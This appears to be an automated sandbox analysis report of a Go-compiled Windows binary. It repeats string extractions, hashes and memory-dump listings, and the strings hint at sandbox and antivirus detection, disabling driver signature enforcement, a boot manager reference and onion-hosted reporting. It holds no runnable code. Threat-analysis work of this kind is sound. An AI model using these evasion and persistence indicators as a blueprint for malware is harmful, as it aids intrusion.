                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000002.325277049.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325699661.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325707206.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325768745.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325779323.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325794304.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325798216.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000C.00000002.325277049.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325699661.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325707206.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325768745.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325779323.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325794304.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000000C.00000002.325798216.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000011.00000002.553432516.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553581530.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553834711.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553854833.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553904538.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553923365.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553938684.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553948921.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000011.00000002.553432516.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553581530.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553834711.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553854833.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553904538.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553923365.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553938684.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000011.00000002.553948921.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000001F.00000002.406735701.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.406806774.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407189360.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407256236.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407264605.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407276012.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407284224.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000001F.00000002.406735701.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.406806774.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407189360.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407256236.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407264605.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407276012.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 0000001F.00000002.407284224.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                                                                                • API String ID: 0-626581767
                                                                                                                                • Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
                                                                                                                                • Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
                                                                                                                                • Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000021.00000002.403664259.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.403771739.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405081350.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405104148.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405430643.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405455302.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405468680.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000021.00000002.405511934.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
